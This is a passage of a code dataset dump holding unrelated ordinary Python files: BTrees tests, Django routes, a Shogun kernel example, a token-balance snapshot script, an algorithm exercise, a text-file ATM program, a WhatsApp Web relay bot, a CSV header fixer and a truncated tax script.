want_w, want_s = self._wintersection(A, B, w1, w2)\n got_w, got_s = self.weightedIntersection(A, B, w1, w2)\n self.assertEqual(got_w, want_w)\n if isaset(got_s):\n self.assertEqual(got_s.keys(), want_s)\n else:\n self.assertEqual(got_s.items(), want_s)\n\n# Given a set builder (like OITreeSet or OISet), return a function that\n# takes a list of (key, value) pairs and builds a set out of the keys.\ndef itemsToSet(setbuilder):\n def result(items, setbuilder=setbuilder):\n return setbuilder([key for key, value in items])\n return result\n\n# 'thing' is a bucket, btree, set or treeset. 
Return true iff it's one of the\n# latter two.\ndef isaset(thing):\n return not hasattr(thing, 'values')\n\nclass TestWeightedII(Weighted):\n from BTrees.IIBTree import weightedUnion, weightedIntersection\n from BTrees.IIBTree import union, intersection\n from BTrees.IIBTree import IIBucket as mkbucket\n builders = IIBucket, IIBTree, itemsToSet(IISet), itemsToSet(IITreeSet)\n\nclass TestWeightedOI(Weighted):\n from BTrees.OIBTree import weightedUnion, weightedIntersection\n from BTrees.OIBTree import union, intersection\n from BTrees.OIBTree import OIBucket as mkbucket\n builders = OIBucket, OIBTree, itemsToSet(OISet), itemsToSet(OITreeSet)\n\n\ndef test_suite():\n s = TestSuite()\n for klass in (TestIIMultiUnion, TestIOMultiUnion,\n TestImports,\n PureII, PureIO, PureOI, PureOO,\n TestWeightedII, TestWeightedOI):\n s.addTest(makeSuite(klass))\n return s\n\ndef main():\n TextTestRunner().run(test_suite())\n\nif __name__ == '__main__':\n main()\n","sub_path":"lib/python/BTrees/tests/testSetOps.py","file_name":"testSetOps.py","file_ext":"py","file_size_in_byte":17887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"299994291","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('insert/', views.insertDB, name='insertDB'),\n path('view/', views.viewDB, name='viewDB'),\n path('delete/', views.delete, name='deleteDB'),\n path('edit/', views.edit, name='editDB'),\n\n]\n","sub_path":"database/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"173135728","text":"# SimpleLocalityImprovedString kernel, is a ``simplified'' and better performing version of the Locality improved kernel.\n\nfrom tools.load import LoadMatrix\nfrom sg import sg\nlm=LoadMatrix()\n\ntraindna=lm.load_dna('../data/fm_train_dna.dat')\ntestdna=lm.load_dna('../data/fm_test_dna.dat')\ntrainlabel=lm.load_labels('../data/label_train_dna.dat')\nparameter_list=[[traindna,testdna,trainlabel,10,5,5,7],\n\t\t[traindna,testdna,trainlabel,11,6,6,8]]\n\ndef kernel_simplelocalityimprovedstring (fm_train_dna=traindna,fm_test_dna=testdna,\n\t\t\t\t label_train_dna=trainlabel,size_cache=10,\n\t\t\t\t length=5,inner_degree=5,outer_degree=7):\n\n\tsg('set_features', 'TRAIN', fm_train_dna, 'DNA')\n\tsg('set_features', 'TEST', fm_test_dna, 'DNA')\n\tsg('set_kernel', 'SLIK', 'CHAR', size_cache, length, inner_degree, outer_degree)\n\tkm=sg('get_kernel_matrix', 'TRAIN')\n\tkm=sg('get_kernel_matrix', 'TEST')\n\treturn km\n\nif __name__=='__main__':\n\tprint('SimpleLocalityImprovedString')\n\tkernel_simplelocalityimprovedstring(*parameter_list[0])\n","sub_path":"build/shogun_lib/examples/documented/python_static/kernel_simplelocalityimprovedstring.py","file_name":"kernel_simplelocalityimprovedstring.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"168995516","text":"import json\nfrom collections import Counter, defaultdict\nfrom concurrent.futures import ThreadPoolExecutor\nfrom datetime import datetime, timedelta, timezone\nfrom fractions import Fraction\nfrom glob import glob\nfrom itertools import count\n\nfrom brownie import Contract, chain, interface, web3\nfrom camera_shy import uniswap_v3\nfrom camera_shy.common import (\n block_after_timestamp,\n decode_logs,\n get_code,\n get_token_transfers,\n transfers_to_balances,\n 
unwrap_balances,\n)\nfrom click import secho\nfrom toolz import concat, groupby, valmap\nfrom tqdm import tqdm\n\nSNAPSHOT_START = datetime(2021, 5, 12, tzinfo=timezone.utc)\nSNAPSHOT_INTERVAL = timedelta(days=7)\nMIN_BALANCE = 2000 * 10 ** 12\nCHAINS = {\n 1: {\n \"network\": \"eth\",\n \"woofy\": \"0xD0660cD418a64a1d44E9214ad8e459324D8157f1\",\n \"deploy_block\": 12414993,\n },\n 250: {\n \"network\": \"ftm\",\n \"woofy\": \"0xD0660cD418a64a1d44E9214ad8e459324D8157f1\",\n \"deploy_block\": 6146773,\n },\n 56: {\n \"network\": \"bsc\",\n \"woofy\": \"0xD0660cD418a64a1d44E9214ad8e459324D8157f1\",\n \"deploy_block\": 7363975,\n },\n 137: {\n \"network\": \"matic\",\n \"woofy\": \"0xD0660cD418a64a1d44E9214ad8e459324D8157f1\",\n \"deploy_block\": 14604154,\n },\n}\nUNISWAP_V3_FACTORY = \"0x1F98431c8aD98523631AE4a59f267346ea31F984\"\nCHAIN = CHAINS[chain.id]\nWOOFY = CHAIN[\"woofy\"]\nDEPLOY_BLOCK = CHAIN[\"deploy_block\"]\n\n\ndef generate_snapshot_blocks(start, interval):\n \"\"\"\n Generate snapshot block numbers at a certain interval.\n \"\"\"\n epochs = {}\n for period in count():\n timestamp = start + interval * period\n if timestamp > datetime.now(tz=timezone.utc):\n break\n\n block = block_after_timestamp(timestamp)\n print(f\"{timestamp} -> {block}\")\n epochs[str(timestamp)] = block\n\n return epochs\n\n\ndef unwrap_uniswap_v3(snapshot, block):\n secho(\"Fetch Uniswap v3 Positions\", fg=\"yellow\")\n uniswap_v3_positions = uniswap_v3.fetch_uniswap_v3_positions(block)\n\n secho(f\"Looking for Uniswap v3 Pools\", fg=\"yellow\")\n uniswap_pools = [\n user for user in tqdm(snapshot) if uniswap_v3.is_uniswap_v3_pool(user)\n ]\n secho(f\"Found {len(uniswap_pools)} Uniswap v3 Pools\", fg=\"yellow\")\n\n replacements = {}\n for pool in uniswap_pools:\n replacements[pool] = uniswap_v3.unwrap_liquidity(\n interface.IUniswapV3Pool(pool),\n Contract(WOOFY),\n uniswap_v3_positions,\n block,\n MIN_BALANCE,\n )\n return replacements\n\n\ndef unwrap_lp_tokens(snapshot, block, min_balance=0):\n codes = list(ThreadPoolExecutor().map(get_code, snapshot))\n contracts = [addr for addr, code in zip(snapshot, codes) if code]\n replacements = {}\n\n for pool in tqdm(contracts, desc=\"identify pools\"):\n try:\n factory = interface.IUniswapV2Pair(pool).factory()\n except ValueError:\n continue\n\n secho(f\"Unwrapping LP {pool} => {factory}\", fg=\"yellow\")\n logs = get_token_transfers(pool, DEPLOY_BLOCK)\n events = decode_logs(list(logs))\n balances = transfers_to_balances(events, block)\n supply = sum(balances.values())\n if not supply:\n continue\n replacements[pool] = {\n user: int(Fraction(balances[user], supply) * snapshot[pool])\n for user in balances\n }\n replacements[pool] = {\n user: balance\n for user, balance in replacements[pool].items()\n if balance >= min_balance\n }\n print(replacements)\n\n return replacements\n\n\ndef main():\n epochs = generate_snapshot_blocks(SNAPSHOT_START, SNAPSHOT_INTERVAL)\n secho(\"Fetch Transfer logs\", fg=\"yellow\")\n logs = get_token_transfers(WOOFY, DEPLOY_BLOCK)\n events = decode_logs(list(logs))\n\n secho(\"Photograph balances at each snapshot block\", fg=\"yellow\")\n snapshots = {\n epoch: transfers_to_balances(events, block, MIN_BALANCE)\n for epoch, block in epochs.items()\n }\n\n secho(\"Check addresses for being LP contracts\", fg=\"yellow\")\n print(valmap(len, snapshots))\n unique = set(concat(snapshots.values()))\n print(len(unique), \"uniques\")\n\n for epoch, block in epochs.items():\n secho(f\"{epoch} Unwrap LP contracts\", fg=\"yellow\")\n\n 
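        # unwrap wrapped positions: LP-token pools on every chain, plus Uniswap v3 NFTs on mainnet (chain.id == 1) only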
print(\"before\", len(snapshots[epoch]))\n        replacements = {}\n\n        replacements.update(unwrap_lp_tokens(snapshots[epoch], block, MIN_BALANCE))\n\n        if chain.id == 1:\n            replacements.update(unwrap_uniswap_v3(snapshots[epoch], block))\n\n        print(\"repl\", replacements)\n        snapshots[epoch] = unwrap_balances(snapshots[epoch], replacements)\n        print(\"after\", len(snapshots[epoch]))\n\n    with open(f\"snapshots/01-balances-{chain.id}.json\", \"wt\") as f:\n        json.dump(snapshots, f, indent=2)\n\n\ndef combine():\n    combined_balances = defaultdict(Counter)\n\n    # balances from all networks are combined\n    sources = [json.load(open(f)) for f in glob(\"snapshots/01-*.json\")]\n    for source in sources:\n        for epoch in source:\n            for user, balance in source[epoch].items():\n                combined_balances[epoch][user] += balance\n\n    # each epoch where you had at least min balance adds a single chance\n    chances = Counter()\n    for epoch in combined_balances:\n        for user in combined_balances[epoch]:\n            assert combined_balances[epoch][user] >= MIN_BALANCE\n            chances[user] += 1\n\n    with open(f\"snapshots/02-chances.json\", \"wt\") as f:\n        json.dump(dict(chances.most_common()), f, indent=2)\n\n    secho(\"chances distributions\", fg=\"yellow\")\n    for a, b in sorted(valmap(len, groupby(chances.get, chances)).items()):\n        print(f\"{a} {b}\")\n\n    secho(\"unique users\", fg=\"yellow\")\n    print(len(chances))\n","sub_path":"scripts/snapshot.py","file_name":"snapshot.py","file_ext":"py","file_size_in_byte":5819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"281986213","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Author : Mike\n# @Contact : 597290963@qq.com\n# @Time : 2021/2/13 7:51\n# @File : MaxProduct.py\nfrom typing import List\n\n\"\"\"\nGiven an integer array nums, find the contiguous subarray (containing at least one number) that has the largest product, and return that product.\n\"\"\"\n\n\nclass Solution:\n\n    def maxProduct(self, nums: List[int]) -> int:\n        if not nums:\n            return 0  # empty input: return 0 so the annotated int return type holds\n\n        res = nums[0]\n        max_res = nums[0]\n        min_res = nums[0]\n        for i in range(1, len(nums)):\n            cur_max = max(min_res * nums[i], nums[i], max_res * nums[i])\n            cur_min = min(min_res * nums[i], nums[i], max_res * nums[i])\n            res = max(res, cur_max)\n            max_res = cur_max\n            min_res = cur_min\n\n        return res\n\n\nif __name__ == '__main__':\n    print(Solution().maxProduct([-4, -3, -2]))\n","sub_path":"datastructure/dp_exercise/MaxProduct.py","file_name":"MaxProduct.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"373676171","text":"import datetime\r\n\r\n\r\ndef accountAvailability(newAccount):\r\n    with open('accounts.txt','r') as f:\r\n        if str(newAccount) in f.read():\r\n            return False\r\n\r\ndef createAccount():\r\n    accountAvailable = False\r\n    while accountAvailable == False:\r\n        while True:\r\n            try:\r\n                newAccount = int(input('Enter your 6-digit account number> '))\r\n                break\r\n            except ValueError:\r\n                print(\"Oops! That was no valid number. Try again...\")\r\n        accountAvailable = accountAvailability(newAccount)\r\n        if accountAvailable == False:\r\n            print('Account number already in use.')\r\n    with open('accounts.txt','a') as f:\r\n        f.write(f'{newAccount} 0\\n')\r\n    print(f'Account {newAccount} created successfully.')\r\n    \r\ndef gotoMainmenu():\r\n    while True:\r\n        while True:\r\n            try:\r\n                entry = int(input('****MAIN MENU****\\n1. Create account\\n2. Login\\n3. End session\\n> '))\r\n                break\r\n            except ValueError:\r\n                print(\"Oops! That was no valid number. 
Try again...\")\r\n        if entry == 1:\r\n            createAccount()\r\n        if entry == 2:\r\n            while True:\r\n                try:\r\n                    login = int(input('login(account number)> '))\r\n                    break\r\n                except ValueError:\r\n                    print(\"Account number invalid.\")\r\n            # check the entered account number once the input loop has finished\r\n            with open('accounts.txt','r') as f:\r\n                if str(login) in f.read():\r\n                    print('login successful. Welcome!')\r\n                    gotoAccountmenu(login)\r\n        if entry == 3:\r\n            print('Session ended. Please come again.')\r\n            break\r\n\r\ndef getbalancefromfile(accountNumber):\r\n    with open('accounts.txt','r') as f:\r\n        data = f.readlines()\r\n    for line in data:\r\n        if line.__contains__(str(accountNumber)):\r\n            accountInfo=line\r\n    balance=int(accountInfo.split(\" \")[1])\r\n    return balance\r\n    \r\ndef updateBalanceinFile(accountNumber, oldBalance, newBalance):\r\n    with open('accounts.txt','r') as f:\r\n        data = f.read()\r\n    data = data.replace (f'{accountNumber} {oldBalance}', f'{accountNumber} {newBalance}')\r\n    with open('accounts.txt','w') as f:\r\n        f.write(data)\r\n    \r\ndef loggTransaction(type, account, amount):\r\n    if type == 'deposit':\r\n        with open('transactions.txt','a') as f:\r\n            timeNow = datetime.datetime.now()\r\n            f.write(f'{timeNow.strftime(\"%c\")} > account = {account} > deposit > {amount} kr\\n')\r\n    elif type == 'withdrawal':\r\n        with open('transactions.txt','a') as f:\r\n            timeNow = datetime.datetime.now()\r\n            f.write(f'{timeNow.strftime(\"%c\")} > account = {account} > withdrawal > {amount} kr\\n')\r\n\r\ndef gotoAccountmenu(login):\r\n    while True:\r\n        while True:\r\n            try:\r\n                entry2 = int(input('****ACCOUNT MENU****\\n1. Withdrawal\\n2. Deposit\\n3. Current balance\\n4. Back to main menu\\n> '))\r\n                break\r\n            except ValueError:\r\n                print(\"Oops! That was no valid number. Try again...\")\r\n        if entry2 == 1:\r\n            while True:\r\n                try:\r\n                    withdrawal = int(input('Amount to withdraw> '))\r\n                    break\r\n                except ValueError:\r\n                    print(\"Oops! That was no valid number. Try again...\")\r\n            currentBalance = getbalancefromfile(login)\r\n            if currentBalance < withdrawal:\r\n                print('Your balance is too low.')\r\n            else:\r\n                newbalance = currentBalance - withdrawal\r\n                updateBalanceinFile(login, currentBalance, newbalance)\r\n                loggTransaction('withdrawal', login, withdrawal)\r\n                print('Withdrawal complete.')\r\n        if entry2 == 2:\r\n            while True:\r\n                try:\r\n                    deposit = int(input('Amount to deposit> '))\r\n                    break\r\n                except ValueError:\r\n                    print(\"Oops! That was no valid number. 
Try again...\")\r\n currentBalance = getbalancefromfile(login)\r\n newbalance = currentBalance + deposit\r\n updateBalanceinFile(login, currentBalance, newbalance)\r\n loggTransaction('deposit', login, deposit)\r\n print('Deposit complete.')\r\n if entry2 == 3:\r\n print(f'Your balance is: {getbalancefromfile(login)} SEK')\r\n if entry2 == 4:\r\n break\r\n\r\ngotoMainmenu()","sub_path":"Bankomat_VG/Bankomat_liveuppdateringtextfil.py","file_name":"Bankomat_liveuppdateringtextfil.py","file_ext":"py","file_size_in_byte":4666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"4358299","text":"from socketIO_client_nexus import SocketIO, LoggingNamespace\nfrom config import token,ip,pathSource,selemiunIP\nfrom Utils.logs import write_log\nimport os, sys, time, json\nimport shutil\nimport traceback\nfrom webwhatsapi import WhatsAPIDriver\nfrom webwhatsapi.objects.message import Message, MediaMessage\nimport shutil\nfrom uuid import uuid4\nfrom threading import Thread\n\n##### Setting for start ######\nprofiledir=os.path.join(\".\",\"firefox_cache_v2\")\nif not os.path.exists(profiledir): os.makedirs(profiledir)\n\nsocketIO = SocketIO(ip,3000, LoggingNamespace)\nwsp = None\ndriver = None\nawaitLogin = None\n\n#####################################\n# Functions Auth #\n#####################################\ndef on_connect(*args):\n write_log('Socket-Info','Connection whit server')\n socketIO.emit('Auth',token)\n\ndef on_welcome(*args):\n try:\n global driver\n write_log('Socket-Info','Connection success')\n # In case of reconnect #\n if driver != None and driver.is_logged_in():\n # Send account info #\n _wsp = {}\n _wsp['whatsAppJoin'] = driver.is_logged_in()\n _wsp['bateryLevel'] = driver.get_battery_level()\n _wsp['numero'] = driver.get_phone_number()\n _wsp['accountDown'] = False\n socketIO.emit('change',_wsp)\n\n # Send messages old #\n oldMessges = Thread(target=getOldMessages)\n oldMessges.start()\n else:\n\n # Send inital data #\n _wsp = {}\n _wsp['whatsAppJoin'] = False\n _wsp['accountDown'] = False\n socketIO.emit('change',_wsp)\n\n driver = WhatsAPIDriver(profile=profiledir, client='remote', command_executor=selemiunIP)\n write_log('Socket-Info','Check if have cache')\n rember = Thread(target=rememberSession)\n rember.start()\n\n except Exception as e:\n write_log('Socket-Error',traceback.format_exc())\n errorSend(traceback.format_exc())\n\ndef on_disconnect(*args):\n write_log('Socket-Info','Connection end')\n\ndef on_reconnect(*args):\n write_log('Socket-Info','Connection reconnect')\n socketIO.emit('Auth',token)\n\n#####################################\n# Fuctions WhatsApp #\n#####################################\n\n# Get the codeQr and emit the id Name #\ndef on_getQr(*args):\n try:\n global driver\n if driver == None:\n driver = WhatsAPIDriver(profile=profiledir, client='remote', command_executor=selemiunIP)\n if driver.is_logged_in():\n write_log('Socket-Info','session started') \n socketIO.emit('change',{'whatsAppJoin':True,'accountDown':False})\n socketIO.emit('sendQr', {'socketId':args[0],'error':'The session is started'} )\n else:\n write_log('Socket-Info','go to qr')\n name = uuid4().hex+'.png'\n if os.path.exists(name): os.remove(name)\n driver.get_qr(name)\n write_log('Socket-Info','saving qr')\n shutil.move('./'+name,pathSource+name)\n write_log('Socket-Info','send qr')\n socketIO.emit('sendQr',{'socketId':args[0],'file':str(name)})\n on_waitLogin(args[0])\n except Exception as e:\n socketIO.emit('sendQr', 
{'socketId':args[0],'error':traceback.format_exc()} )\n write_log('Socket-Error',traceback.format_exc())\n errorSend(traceback.format_exc())\n \n# await for login in whatsApp #\ndef on_waitLogin(*args):\n try:\n global awaitLogin, driver\n if awaitLogin == None:\n awaitLogin = True\n driver.wait_for_login()\n\n # Save session #\n driver.save_firefox_profile()\n\n # Send change in account #\n _wsp = {}\n _wsp['whatsAppJoin'] = True\n _wsp['bateryLevel'] = driver.get_battery_level()\n _wsp['numero'] = driver.get_phone_number()\n _wsp['accountDown'] = False\n socketIO.emit('change',_wsp)\n \n # Send login success #\n socketIO.emit('receiverLogin',args[0])\n write_log('Socket-Info','session start')\n\n # Send the status of account in whatsApp # \n write_log('Socket-Info','Init event loop')\n loop = Thread(target=loopStatus)\n loop.start()\n\n # Send all messages unread #\n oldMessges = Thread(target=getOldMessages)\n oldMessges.start()\n\n # Suscribe to observable #\n driver.subscribe_new_messages(NewMessageObserver())\n\n except Exception as e:\n write_log('Socket-Error',traceback.format_exc())\n errorSend(traceback.format_exc())\n awaitLogin = False\n\n# started loop whats send status account #\ndef loopStatus():\n try:\n global wsp\n while driver != None:\n time.sleep(60)\n write_log('Socket-Info','Send account info')\n if driver.is_logged_in():\n _wsp = {}\n _wsp['whatsAppJoin'] = driver.is_logged_in()\n _wsp['bateryLevel'] = driver.get_battery_level()\n _wsp['numero'] = driver.get_phone_number()\n _wsp['accountDown'] = False\n socketIO.emit('change',_wsp)\n else:\n _wsp = {}\n _wsp['whatsAppJoin'] = driver.is_logged_in()\n _wsp['bateryLevel'] = driver.get_battery_level()\n _wsp['numero'] = driver.get_phone_number()\n _wsp['accountDown'] = False\n socketIO.emit('change',_wsp)\n except Exception as e:\n write_log('Socket-Error',traceback.format_exc())\n errorSend(traceback.format_exc())\n\n# Get all chats not read in the account ONLY in start session #\ndef getOldMessages():\n try:\n chats = {}\n write_log('Socket-Info','Get oldMessage')\n for chat in driver.get_chats_whit_messages():\n print(\"CHAT NUEVO\")\n print(chat.get('id'))\n print(\"5215566694159@c.us\")\n if chat.get('isGroup') != True:\n\n ############################################\n #### SE RETIRARA DEL CODIGO ESTA LINEA, ####\n #### TRABA LA EJECUCIÓN DEL PROGRAMA ####\n #### GAMA 2019-04-30 ####\n ############################################\n #driver.chat_load_earlier_messages(chat.get('id'))\n if chat.get('id') not in \"5215566694159@c.us\":\n chats[str(chat.get('id'))] = []\n _messages = driver.get_all_messages_in_chat(chat.get('id'),True)\n for message in _messages:\n chatId = message._js_obj.get('chat').get('id').get('_serialized')\n sendByMy = True if driver.get_phone_number() == message.sender.id else False\n body = {'chat':chatId,'message':'','type':False,'caption':False,'sendBy':sendByMy}\n if message.type == 'image':\n body['message'] = str(message.save_media(pathSource,True))\n body['type'] = 'image'\n body['caption'] = message.caption\n elif message.type == 'video':\n body['message'] = str(message.save_media(pathSource,True))\n body['type'] = 'video'\n body['caption'] = message.caption\n elif message.type == 'document':\n body['message'] = str(message.save_media(pathSource,True))\n body['type'] = 'file'\n body['caption'] = message.caption\n elif message.type == 'audio' or message.type == 'ptt':\n content = str(message.save_media(pathSource,True))\n os.rename(content, content+'.ogg')\n body['message'] = content\n 
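                            # note: the saved file was renamed to content + '.ogg' above, but 'message' still stores the pre-rename path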
body['type'] = 'ogg'\n elif message.type == 'chat':\n body['message'] = message.content\n else :\n body['message'] = 'No soportado'\n\n chats[chatId].append(body)\n else:\n write_log('Socket-Info','Message of group')\n ##############################################\n #### SE RETIRARA DEL CODIGO ESTA FUNCION, ####\n #### TRABA LA EJECUCIÓN DEL PROGRAMA ####\n #### GAMA 2019-04-30 ####\n ##############################################\n #outGroup = Thread(target=exitGroup,args=(chat.get('id'),))\n #outGroup.start()\n\n socketIO.emit('oldMessages',chats)\n except Exception as e:\n write_log('Socket-Error',traceback.format_exc())\n errorSend(traceback.format_exc())\n\n# Remember session #\ndef rememberSession():\n global driver\n try:\n\n driver.wait_for_login(40)\n\n if driver.is_logged_in():\n # Send account info #\n write_log('Socket-Info','Send account info')\n _wsp = {}\n _wsp['whatsAppJoin'] = driver.is_logged_in()\n _wsp['bateryLevel'] = driver.get_battery_level()\n _wsp['numero'] = driver.get_phone_number()\n _wsp['accountDown'] = False\n socketIO.emit('change',_wsp)\n\n # Send messages old # \n oldMessges = Thread(target=getOldMessages)\n oldMessges.start()\n\n # Send the status of account in whatsApp # \n write_log('Socket-Info','Init event loop')\n loop = Thread(target=loopStatus)\n loop.start()\n\n # Suscribe to observable #\n driver.subscribe_new_messages(NewMessageObserver())\n except Exception as e:\n write_log('Socket-Error',traceback.format_exc())\n errorSend(traceback.format_exc())\n\ndef exitGroup(idChat):\n global driver\n try:\n write_log('Socket-Info','Exit group')\n driver.exit_group(idChat)\n except Exception as e:\n write_log('Socket-Error',traceback.format_exc())\n errorSend(traceback.format_exc())\n\ndef on_sendText(*args):\n try:\n id = args[0][0]\n message = args[0][1]\n write_log('Socket-Error','Send Message')\n\n send = Thread(target=sendText,args=(id,message))\n send.start()\n except Exception as e:\n write_log('Socket-Error',traceback.format_exc())\n errorSend(traceback.format_exc())\n\ndef sendText(id,message):\n try:\n driver.send_message_to_id(id,message)\n driver.mark_read(id)\n socketIO.emit('newMessage',{'chat':id,'message':message,'sendBy':'Agent'})\n except Exception as e:\n write_log('Socket-Error',traceback.format_exc())\n socketIO.emit('errorSendTxt',{'chat':id,'message':message,'sendBy':'Agent'})\n errorSend(traceback.format_exc())\n\ndef on_sendFile(*args):\n try:\n write_log('Socket-Error','Send File')\n id = args[0][0]\n caption = args[0][1]\n typeMessage = args[0][2]\n fileMessage = args[0][3]\n send = Thread(target=sendFile,args=(id,caption,typeMessage,fileMessage))\n send.start()\n except Exception as e:\n write_log('Socket-Error',traceback.format_exc())\n socketIO.emit('errorSendFile',{'chat':id,'message':caption,'sendBy':'Agent'})\n errorSend(traceback.format_exc())\n\ndef sendFile(id,caption,typeMessage,fileMessage):\n try:\n write_log('Socket-Error','Sending File')\n driver.send_media(pathSource+fileMessage,id,caption)\n driver.mark_read(id)\n write_log('Socket-Error','Send File end')\n socketIO.emit('newMessage',{'chat':id,'message':fileMessage,'type':typeMessage,'caption':caption,'sendBy':'Agent'})\n except Exception as e:\n write_log('Socket-Error',traceback.format_exc())\n socketIO.emit('errorSendFile',{'chat':id,'message':caption,'sendBy':'Agent'})\n errorSend(traceback.format_exc())\n\ndef on_deleteChat(*args):\n try:\n print(args[0])\n write_log('Socket-Error','Delete Chat'+str(args[0]))\n delChat = 
Thread(target=delete,args=(args[0],))\n delChat.start()\n except Exception as e:\n write_log('Socket-Error',traceback.format_exc())\n errorSend(traceback.format_exc())\n\ndef delete(id):\n try:\n write_log('Socket-Error','Delete Chat'+str(id))\n driver.delete_chat(str(id))\n except Exception as e:\n write_log('Socket-Error',traceback.format_exc())\n errorSend(traceback.format_exc())\n\n\n#####################################\n# Chat Functions #\n#####################################\n\n# Receive info for the account is change #\ndef on_matchUpdate(*args):\n try:\n global wsp\n wsp = args[0]\n print(wsp)\n except Exception as e:\n write_log('Socket-Error',traceback.format_exc())\n errorSend(traceback.format_exc())\n\n\n#####################################\n# Admin Functions #\n#####################################\n\n# Send error to serverSocket \ndef errorSend(error):\n socketIO.emit('clientError',[wsp['token'],error])\n\n# Send screenShoot to admin in BK#\ndef on_giveScreen(*args):\n try:\n _screen = Thread(target=screen,args=(args[0],))\n _screen.start()\n except Exception as e:\n write_log('Socket-Error',traceback.format_exc())\n errorSend(traceback.format_exc())\n socketIO.emit('sendScreen', {'socketId':args[0],'error':traceback.format_exc()} )\n\ndef screen(id):\n try:\n if driver != None:\n write_log('Socket-Info','go to screen'+id)\n name = uuid4().hex+'.png'\n if os.path.exists(name): os.remove(name)\n driver.screenshot(name)\n write_log('Socket-Info','saving screen')\n shutil.move('./'+name,pathSource+name)\n socketIO.emit('sendScreen',{'socketId':id,'file':str(name)})\n else:\n socketIO.emit('sendScreen', {'socketId':id,'error':'Browser not connected'} )\n except Exception as e:\n write_log('Socket-Error',traceback.format_exc())\n errorSend(traceback.format_exc())\n socketIO.emit('sendScreen', {'socketId':id,'error':traceback.format_exc()} )\n\n##########################\n# OBSERVABLE #\n##########################\nclass NewMessageObserver:\n def on_message_received(self, new_messages):\n for message in new_messages:\n if message.sender.id not in \"5215566694159@c.us\":\n if message.type == 'chat':\n write_log('Socket-Info',\"New message '{}' received from number {}\".format(message.type, message.sender.id))\n socketIO.emit('newMessage',{'chat':message.sender.id,'message':message.content})\n else:\n write_log('Socket-Info',\"New message of type '{}' received from number {}\".format(message.type, message.sender.id))\n if message.type == 'image':\n content = str(message.save_media(pathSource,True))\n socketIO.emit('newMessage',{'chat':message.sender.id,'message':content,'type':'image','caption':message.caption})\n elif message.type == 'video':\n content = str(message.save_media(pathSource,True))\n socketIO.emit('newMessage',{'chat':message.sender.id,'message':content,'type':'video','caption':message.caption})\n elif message.type == 'document':\n content = str(message.save_media(pathSource,True))\n socketIO.emit('newMessage',{'chat':message.sender.id,'message':content,'type':'file','caption':message.caption})\n elif message.type == 'audio' or message.type == 'ptt':\n content = str(message.save_media(pathSource,True))\n os.rename(content, content+'.ogg')\n socketIO.emit('newMessage',{'chat':message.sender.id,'message':content+'.ogg','type':'ogg','caption':message.caption})\n else:\n socketIO.emit('newMessage',{'chat':message.sender.id,'message':'Contenido No soportado'})\n\n\n##### SOCKET LISSENER #####\nsocketIO.on('connect', on_connect)\nsocketIO.on('welcome', 
on_welcome)\nsocketIO.on('reconnect', on_reconnect)\nsocketIO.on('getQr',on_getQr)\nsocketIO.on('matchUpdate',on_matchUpdate)\nsocketIO.on('giveScreen',on_giveScreen)\nsocketIO.on('sendText',on_sendText)\nsocketIO.on('sendFile',on_sendFile)\nsocketIO.on('deleteChat',on_deleteChat)\n\nsocketIO.wait()\n\n\n# def on_sendFile(*args):\n# try:\n# id = args[0][0]\n# caption = args[0][1]\n# typeMessage = args[0][2]\n# fileMessage = args[0][3]\n# send = Thread(target=sendFile,args=(id,caption,typeMessage,fileMessage))\n# send.start()\n# except Exception as e:\n# write_log('Socket-Error',traceback.format_exc())\n# socketIO.emit('errorSendFile',{'chat':id,'message':caption,'sendBy':'Agent'})\n# errorSend(traceback.format_exc())","sub_path":"init_v21.py","file_name":"init_v21.py","file_ext":"py","file_size_in_byte":17285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"405651524","text":"\"\"\"\n*******************************************************\n * Copyright (C) 2017 MindsDB Inc. \n *\n * This file is part of MindsDB Server.\n *\n * MindsDB Server can not be copied and/or distributed without the express\n * permission of MindsDB Inc\n *******************************************************\n\"\"\"\n\nimport csv\nimport sys\nimport traceback\n\nfrom mindsdb.libs.data_types.mindsdb_logger import log\n\n\ndef fixFileIfPossible(filepath):\n \"\"\"\n Tries to fix a file header if it finds header or encoding issues\n :param filepath: the filepath to fix if possible\n :return: fixed, error\n \"\"\"\n fixed = False\n error = False\n rows = []\n try:\n with open(filepath, newline='') as f:\n reader = csv.reader(f)\n header = None\n max_len = 0\n for row in reader:\n if header is None:\n header = row\n for i, col in enumerate(row):\n if col in [None, '']:\n fixed = True\n header[i] = 'col_{i}'.format(i=i+1)\n rows += [row]\n length = int(len(row))\n if length > max_len:\n max_len = length\n log.info(max_len)\n except:\n exc_type, exc_value, exc_traceback = sys.exc_info()\n error = traceback.format_exception(exc_type, exc_value,\n exc_traceback)\n return fixed, error\n if len(header) < max_len or fixed == True:\n rightCell = lambda h, i: 'col_{i}'.format(i=i+1) if i > len(header) else h\n row = [rightCell(header_col, i) for i, header_col in enumerate(header)]\n rows[0] = row\n\n with open(filepath, 'w', newline='') as f:\n writer = csv.writer(f)\n writer.writerows(rows)\n\n return fixed, error\n\ndef test():\n log.info(fixFileIfPossible('/Users/jorge/Downloads/tweets (1).csv'))\n\n# only run the test if this file is called from debugger\nif __name__ == \"__main__\":\n test()\n","sub_path":"mindsdb/libs/helpers/file_helpers.py","file_name":"file_helpers.py","file_ext":"py","file_size_in_byte":2079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"615472853","text":"#!/usr/bin/env python3\n\nimport sys\nlist = []\ndict = {}\nfor arg in sys.argv[1:]:\n try:\n list.append(arg.split(':')[0])\n dict[arg.split(':')[0]] = int(arg.split(':')[1])\n except ValueError:\n print(\"Parameter Error\")\n\ndef getPostTaxWage(wage):\n qcd = 0\n rate = 0\n wage_tax_val = wage - wage * (0.08 + 0.02 + 0.005 + 0.06) - 3500\n if 